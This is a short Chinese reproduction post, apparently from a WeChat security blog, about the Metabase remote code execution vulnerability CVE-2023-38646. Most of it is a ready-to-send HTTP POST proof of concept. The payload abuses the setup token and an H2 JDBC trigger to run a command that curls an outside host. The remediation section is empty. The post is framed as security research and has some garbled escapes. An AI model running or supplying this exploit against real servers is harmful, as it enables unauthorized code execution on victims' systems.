0X01 简介
Metabase是一个开源的商业智能平台。你可以使用Metabase探索你的数据,或者将Metabase嵌入你的应用程序中,让你的客户自己探索他们的数据。
复现环境:
获取tokenhttp://192.168.245.134:3000/api/session/properties
POC:
POST /api/setup/validate HTTP/1.1Host: 192.168.245.134:3000Content-Type: application/jsonContent-Length: 749{"token": "dc4efa5c-831f-4c2c-87d3-971072537ab0","details":{"is_on_demand": false,"is_full_sync": false,"is_sample": false,"cache_ttl": null,"refingerprint": false,"auto_run_queries": true,"schedules":{},"details":{"db": "zip:./Desktop/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptnjava.lang.Runtime.getRuntime().exec('curl http://192.168.245.129:9999')n$$--=x","advanced-options": false,"ssl": true},"name": "test1","engine": "h2"}}
测试环境metabase.jar放在桌面,CMD路径在C:Userstest,需拼接一个Desktop目录,这里可以去拼接路径,也可以写绝对路径。
0X03 修复建议
0X04 写在最后
回复“加群”,获取群号。
侵删!
原文始发于微信公众号(皓月的笔记本):【漏洞复现】Metabase 代码执行漏洞(CVE-2023-38646)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论